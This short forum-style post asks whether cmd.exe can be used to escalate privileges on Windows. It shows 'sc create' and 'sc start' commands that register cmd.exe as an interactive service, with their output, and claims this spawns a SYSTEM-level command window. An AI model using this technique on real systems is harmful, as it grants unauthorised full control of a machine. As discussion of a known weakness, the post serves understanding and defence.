I could be completely wrong about this, but is it possible that cmd.exe itself could be used to elevate priveleges?
>sc create testsvc binpath= "cmd /K start" type= own type= interact
[SC] CreateService SUCCESS
>sc start testsvc
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Note that the SC START immediately creates a new CMD window with system priveleges, even if the original CMD window failed to start with error 1053 (this is expected since CMD.EXE doesn’t have any service related code in it).
A good firewall should detect this though.
